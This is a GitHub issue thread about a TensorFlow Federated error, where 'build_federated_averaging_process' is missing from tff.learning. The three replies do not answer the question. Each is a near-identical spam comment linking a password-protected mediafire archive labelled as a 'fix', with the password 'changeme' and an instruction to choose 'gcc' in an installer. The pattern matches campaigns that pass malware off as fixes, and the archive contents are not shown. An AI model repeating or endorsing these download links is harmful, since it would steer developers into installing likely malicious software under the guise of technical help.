### ISSUE TITLE
import tensorflow_federated as tff  # List all attributes and methods in tff.learning print(dir(tff.learning.algorithms.build_weighted_fed_avg))

### ISSUE THREAD

**Issue by rehmanaziz3** [tensorflow/tensorflow#74593]
---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
[<ipython-input-19-4b390ec8eab5>](https://localhost:8080/#) in <cell line: 56>()
     54 
     55 # Create a federated averaging process
---> 56 iterative_process = tff.learning.build_federated_averaging_process(
     57     model_fn=model_fn,
     58     client_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=0.01),

AttributeError: module 'tensorflow_federated.python.learning' has no attribute 'build_federated_averaging_process'

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
